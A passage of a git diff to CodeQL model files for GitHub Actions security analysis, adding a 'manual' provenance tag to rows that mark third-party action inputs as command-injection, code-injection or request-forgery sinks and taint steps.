a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection"] \ No newline at end of file + - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 57c35c90214..66280f8bdd6 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint"] - - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint"] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"] + - ["mad9000/actions-find-and-replace-string", "*", "input.replace", "output.value", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml index 9ce43e68a75..65965daeb1d 100644 --- a/ql/lib/ext/magefile_mage-action.model.yml +++ b/ql/lib/ext/magefile_mage-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["magefile/mage-action", "*", "input.args", "command-injection"] + - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml index ac3aaa67def..ba9a04f588b 100644 --- a/ql/lib/ext/maierj_fastlane-action.model.yml +++ b/ql/lib/ext/maierj_fastlane-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["maierj/fastlane-action", "*", "input.lane", "command-injection"] - - ["maierj/fastlane-action", "*", "input.options", "command-injection"] - - ["maierj/fastlane-action", "*", "input.env", "command-injection"] + - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"] + - ["maierj/fastlane-action", "*", "input.options", "command-injection", "manual"] + - ["maierj/fastlane-action", "*", "input.env", "command-injection", "manual"] diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml index 90fd673c705..aea054e24b0 100644 --- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml +++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection"] - - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection"] - - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection"] - - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection"] + - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"] + - ["manusa/actions-setup-minikube", "*", "input.driver", "command-injection", "manual"] + - ["manusa/actions-setup-minikube", "*", "input.container_runtime", "command-injection", "manual"] + - ["manusa/actions-setup-minikube", "*", "input.start_args", "command-injection", "manual"] diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml index 9f621758cff..7a556a0f0ec 100644 --- a/ql/lib/ext/marocchino_on_artifact.model.yml +++ b/ql/lib/ext/marocchino_on_artifact.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact"] + - ["marocchino/on_artifact", "*", "output.*", "Downloaded artifact", "manual"] diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml index 2c9f46b46f4..bb1c3ffca2a 100644 --- a/ql/lib/ext/mattdavis0351_actions.model.yml +++ b/ql/lib/ext/mattdavis0351_actions.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint"] - - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint"] + - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] + - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection"] - - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection"] - - ["mattdavis0351/actions", "*", "input.image-name", "command-injection"] - - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection"] - - ["mattdavis0351/actions", "*", "input.tag", "command-injection"] + - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.dockerfile-location", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.image-name", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.dockerfile-name", "command-injection", "manual"] + - ["mattdavis0351/actions", "*", "input.tag", "command-injection", "manual"] diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml index 1bcf8e7ce7a..d3bec5ea39d 100644 --- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml +++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection"] + - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"] diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml index dfa441761ab..c65527150b5 100644 --- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"] + - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"] diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml index 81706744568..25565b445fc 100644 --- a/ql/lib/ext/microsoft_setup-msbuild.model.yml +++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection"] - - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection"] + - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"] + - ["microsoft/setup-msbuild", "*", "input.vswhere-path", "command-injection", "manual"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index 18297709838..d46a07dde96 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"] + - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"] diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml index aeca6db0d98..2d162fbc914 100644 --- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml +++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection"] - - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection"] \ No newline at end of file + - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.buildArgs", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.labels", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.target", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.directory", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.platform", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.image", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.registry", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.dockerfile", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.githubOrg", "command-injection", "manual"] + - ["mr-smithers-excellent/docker-build-push", "*", "input.username", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml index b9358bd2d69..fc91bacdb72 100644 --- a/ql/lib/ext/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/msys2_setup-msys2.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["msys2/setup-msys2", "*", "input.install", "command-injection"] - - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection"] \ No newline at end of file + - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"] + - ["msys2/setup-msys2", "*", "input.pacboy", "command-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml index a18319954e3..8b2b4e79afa 100644 --- a/ql/lib/ext/mxschmitt_action-tmate.model.yml +++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection"] - - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection"] + - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"] + - ["mxschmitt/action-tmate", "*", "input.tmate-server-ed25519-fingerprint", "command-injection", "manual"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index f46c40a8f9c..2ea1fdf6855 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection"] - - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection"] + - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"] + - ["mymindstorm/setup-emsdk", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml index 219de80c39e..21e0d819db7 100644 --- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml +++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection"] + - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml index dc3c2739e87..bcc8ce6b80d 100644 --- a/ql/lib/ext/nanasess_setup-php.model.yml +++ b/ql/lib/ext/nanasess_setup-php.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nanasess/setup-php", "*", "input.php-version", "command-injection"] + - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"] diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml index 30679750f13..741ab37eb9b 100644 --- a/ql/lib/ext/nick-fields_retry.model.yml +++ b/ql/lib/ext/nick-fields_retry.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection"] - - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection"] - - ["nick-fields/retry", "*", "input.command", "command-injection"] + - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"] + - ["nick-fields/retry", "*", "input.new_command_on_retry", "command-injection", "manual"] + - ["nick-fields/retry", "*", "input.command", "command-injection", "manual"] diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml index c600e7a93b6..a9d6b80a627 100644 --- a/ql/lib/ext/octokit_graphql-action.model.yml +++ b/ql/lib/ext/octokit_graphql-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octokit/graphql-action", "*", "input.query", "request-forgery"] + - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"] diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml index ed9088c9f56..73d4df99af2 100644 --- a/ql/lib/ext/octokit_request-action.model.yml +++ b/ql/lib/ext/octokit_request-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["octokit/request-action", "*", "input.route", "request-forgery"] + - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"] diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml index 988c3d5e674..fb6ae5102e1 100644 --- a/ql/lib/ext/olafurpg_setup-scala.model.yml +++ b/ql/lib/ext/olafurpg_setup-scala.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection"] + - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"] diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml index 91a3382348c..8b29e5c9988 100644 --- a/ql/lib/ext/paambaati_codeclimate-action.model.yml +++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection"] + - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml index d9d15dc94b2..5a5cedcaca5 100644 --- a/ql/lib/ext/peter-evans_create-pull-request.model.yml +++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection"] + - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml index 6bc0467692d..12d3f23f8fd 100644 --- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml +++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection"] - - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection"] - - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection"] + - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"] + - ["plasmicapp/plasmic-action", "*", "input.project_api_token", "command-injection", "manual"] + - ["plasmicapp/plasmic-action", "*", "input.branch", "command-injection", "manual"] diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml index 62dea47d818..30be564c42a 100644 --- a/ql/lib/ext/preactjs_compressed-size-action.model.yml +++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection"] - - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection"] + - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"] + - ["preactjs/compressed-size-action", "*", "input.clean-script", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml index 525d0199859..13d4cfeb814 100644 --- a/ql/lib/ext/py-actions_flake8.model.yml +++ b/ql/lib/ext/py-actions_flake8.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["py-actions/flake8", "*", "input.flake8-version", "command-injection"] - - ["py-actions/flake8", "*", "input.plugins", "command-injection"] - - ["py-actions/flake8", "*", "input.path", "command-injection"] - - ["py-actions/flake8", "*", "input.ignore", "command-injection"] - - ["py-actions/flake8", "*", "input.exclude", "command-injection"] - - ["py-actions/flake8", "*", "input.max-line-length", "command-injection"] - - ["py-actions/flake8", "*", "input.args", "command-injection"] + - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.plugins", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.path", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.ignore", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.exclude", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.max-line-length", "command-injection", "manual"] + - ["py-actions/flake8", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml index 5aac0f89432..3043c9b30ec 100644 --- a/ql/lib/ext/py-actions_py-dependency-install.model.yml +++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["py-actions/py-dependency-install", "*", "input.path", "command-injection"] + - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml index d32c6509ad7..29d51d1bfbb 100644 --- a/ql/lib/ext/pyo3_maturin-action.model.yml +++ b/ql/lib/ext/pyo3_maturin-action.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection"] - - ["pyo3/maturin-action", "*", "input.target", "command-injection"] - - ["pyo3/maturin-action", "*", "input.command", "command-injection"] - - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection"] + - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"] + - ["pyo3/maturin-action", "*", "input.target", "command-injection", "manual"] + - ["pyo3/maturin-action", "*", "input.command", "command-injection", "manual"] + - ["pyo3/maturin-action", "*", "input.manylinux", "command-injection", "manual"] diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml index c4ea326ecef..75a9650a92f 100644 --- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml +++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml @@ -3,22 +3,22 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] - - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection"] + - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.target", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.arch", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.profile", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.sdcard-path-or-size'", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.cores", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ram-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.heap-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.disk-size", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-options", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.emulator-build", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.cmake", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] + - ["reactivecircus/android-emulator-runner", "*", "input.ndk", "command-injection", "manual"] diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml index 52c478dd1d4..9b0ec011fd6 100644 --- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml +++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact"] + - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "Downloaded artifact", "manual"] diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml index 7213a39f992..a0c4d6f7ec5 100644 --- a/ql/lib/ext/reggionick_s3-deploy.model.yml +++ b/ql/lib/ext/reggionick_s3-deploy.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.cache", "command-injection"] - - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection"] + - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.bucket-region", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.dist-id", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.invalidation", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.delete-removed", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.cacheControl", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.cache", "command-injection", "manual"] + - ["reggionick/s3-deploy", "*", "input.files-to-include", "command-injection", "manual"] diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml index 3207c6d7521..b5d4629003b 100644 --- a/ql/lib/ext/renovatebot_github-action.model.yml +++ b/ql/lib/ext/renovatebot_github-action.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection"] - - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection"] - - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection"] - - ["renovatebot/github-action", "*", "input.docker-user", "command-injection"] - - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection"] + - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.renovate-version", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.docker-cmd-file", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.docker-user", "command-injection", "manual"] + - ["renovatebot/github-action", "*", "input.docker-volumes", "command-injection", "manual"] diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml index d00d78bcba8..4b96edeccc2 100644 --- a/ql/lib/ext/roots_issue-closer-action.model.yml +++ b/ql/lib/ext/roots_issue-closer-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection"] - - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection"] + - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"] + - ["roots/issue-closer-action", "*", "input.pr-close-message", "code-injection", "manual"] diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml index e2813105bdc..ae3ef2e2b1b 100644 --- a/ql/lib/ext/ros-tooling_setup-ros.model.yml +++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection"] + - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index d6ba27a5079..079dfc1fc02 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] + - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection"] + - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 413f4f3058b..19edd617c67 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -3,9 +3,9 @@ extensions: pack: githubsecuritylab/actions-all extensible: summaryModel data: - - 